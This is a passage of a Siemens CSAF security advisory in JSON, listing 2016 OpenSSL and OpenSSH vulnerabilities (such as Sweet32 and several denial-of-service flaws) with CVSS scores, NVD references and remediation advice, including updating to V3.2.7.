"remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.8, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2182" }, { "cve": "CVE-2016-2183", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "notes": [ { "category": "summary", "text": "The DES and Triple DES ciphers, as used in the TLS, SSH, and IPSec protocols and other protocols and products, have a birthday bound of approximately four billion blocks, which makes it easier for remote attackers to obtain cleartext data via a birthday attack against a long-duration encrypted session, as demonstrated by an HTTPS session using Triple DES in CBC mode, aka a \"Sweet32\" attack.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-2183" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-2183" }, { "cve": "CVE-2016-6210", "cwe": { "id": "CWE-200", "name": "Exposure of Sensitive Information to an Unauthorized Actor" }, "notes": [ { "category": "summary", "text": "sshd in OpenSSH before 7.3, when SHA256 or SHA512 are used for user password hashing, uses BLOWFISH hashing on a static password when the username does not exist, which allows remote attackers to enumerate users by leveraging the timing difference between responses when a large password is provided.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6210" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.9, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-6210" }, { "cve": "CVE-2016-6302", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "notes": [ { "category": "summary", "text": "The tls_decrypt_ticket function in ssl/t1_lib.c in OpenSSL before 1.1.0 does not consider the HMAC size during validation of the ticket length, which allows remote attackers to cause a denial of service via a ticket that is too short.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6302" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-6302" }, { "cve": "CVE-2016-6303", "cwe": { "id": "CWE-787", "name": "Out-of-bounds Write" }, "notes": [ { "category": "summary", "text": "Integer overflow in the MDC2_Update function in crypto/mdc2/mdc2dgst.c in OpenSSL before 1.1.0 allows remote attackers to cause a denial of service (out-of-bounds write and application crash) or possibly have unspecified other impact via unknown vectors.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6303" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 9.8, "baseSeverity": "CRITICAL", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-6303" }, { "cve": "CVE-2016-6304", "cwe": { "id": "CWE-401", "name": "Missing Release of Memory after Effective Lifetime" }, "notes": [ { "category": "summary", "text": "Multiple memory leaks in t1_lib.c in OpenSSL before 1.0.1u, 1.0.2 before 1.0.2i, and 1.1.0 before 1.1.0a allow remote attackers to cause a denial of service (memory consumption) via large OCSP Status Request extensions.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6304" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-6304" }, { "cve": "CVE-2016-6305", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "notes": [ { "category": "summary", "text": "The ssl3_read_bytes function in record/rec_layer_s3.c in OpenSSL 1.1.0 before 1.1.0a allows remote attackers to cause a denial of service (infinite loop) by triggering a zero-length record in an SSL_peek call.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6305" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-6305" }, { "cve": "CVE-2016-6306", "cwe": { "id": "CWE-125", "name": "Out-of-bounds Read" }, "notes": [ { "category": "summary", "text": "The certificate parser in OpenSSL before 1.0.1u and 1.0.2 before 1.0.2i might allow remote attackers to cause a denial of service (out-of-bounds read) via crafted certificate operations, related to s3_clnt.c and s3_srvr.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6306" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.9, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-6306" }, { "cve": "CVE-2016-6307", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "notes": [ { "category": "summary", "text": "The state-machine implementation in OpenSSL 1.1.0 before 1.1.0a allocates memory before checking for an excessive length, which might allow remote attackers to cause a denial of service (memory consumption) via crafted TLS messages, related to statem/statem.c and statem/statem_lib.c.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6307" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.9, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-6307" }, { "cve": "CVE-2016-6308", "cwe": { "id": "CWE-130", "name": "Improper Handling of Length Parameter Inconsistency" }, "notes": [ { "category": "summary", "text": "statem/statem_dtls.c in the DTLS implementation in OpenSSL 1.1.0 before 1.1.0a allocates memory before checking for an excessive length, which might allow remote attackers to cause a denial of service (memory consumption) via crafted DTLS messages.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6308" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 5.9, "baseSeverity": "MEDIUM", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-6308" }, { "cve": "CVE-2016-6515", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "notes": [ { "category": "summary", "text": "The auth_password function in auth-passwd.c in sshd in OpenSSH before 7.3 does not limit password lengths for password authentication, which allows remote attackers to cause a denial of service (crypt CPU consumption) via a long string.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-6515" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-6515" }, { "cve": "CVE-2016-8858", "cwe": { "id": "CWE-401", "name": "Missing Release of Memory after Effective Lifetime" }, "notes": [ { "category": "summary", "text": "** DISPUTED ** The kex_input_kexinit function in kex.c in OpenSSH 6.x and 7.x through 7.3 allows remote attackers to cause a denial of service (memory consumption) by sending many duplicate KEXINIT requests. NOTE: a third party reports that \"OpenSSH upstream does not consider this as a security issue.\"", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ], "url": "https://support.industry.siemens.com/cs/ww/en/view/109814809/" }, { "category": "mitigation", "details": "As a general security measure, Siemens strongly recommends to protect network access to devices with appropriate mechanisms. In order to operate the devices in a protected IT environment, Siemens recommends to configure the environment according to Siemens\u0027 operational guidelines for Industrial Security (Download: \nhttps://www.siemens.com/cert/operational-guidelines-industrial-security), and to follow the recommendations in the product manuals.\nAdditional information on Industrial Security by Siemens can be found at: \nhttps://www.siemens.com/industrialsecurity", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "scores": [ { "cvss_v3": { "baseScore": 7.5, "baseSeverity": "HIGH", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:P/RL:O/RC:C", "version": "3.1" }, "products": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] } ], "title": "CVE-2016-8858" }, { "cve": "CVE-2016-10009", "cwe": { "id": "CWE-426", "name": "Untrusted Search Path" }, "notes": [ { "category": "summary", "text": "Untrusted search path vulnerability in ssh-agent.c in ssh-agent in OpenSSH before 7.4 allows remote attackers to execute arbitrary local PKCS#11 modules by leveraging control over a forwarded agent-socket.", "title": "Summary" } ], "product_status": { "known_affected": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, "references": [ { "category": "external", "summary": "nvd.nist.gov", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-10009" }, { "category": "external", "summary": "www.first.org", "url": "https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" } ], "remediations": [ { "category": "mitigation", "details": "Restrict access to the affected systems, especially to ports 22/tcp and 443/tcp to trusted IP addresses only", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "mitigation", "details": "Deactivate the webserver if not required, and if deactivation is supported by the product", "product_ids": [ "CSAFPID-0001", "CSAFPID-0002", "CSAFPID-0003", "CSAFPID-0004", "CSAFPID-0005" ] }, { "category": "vendor_fix", "details": "Update to V3.2.7 or later version", "product_ids": [ 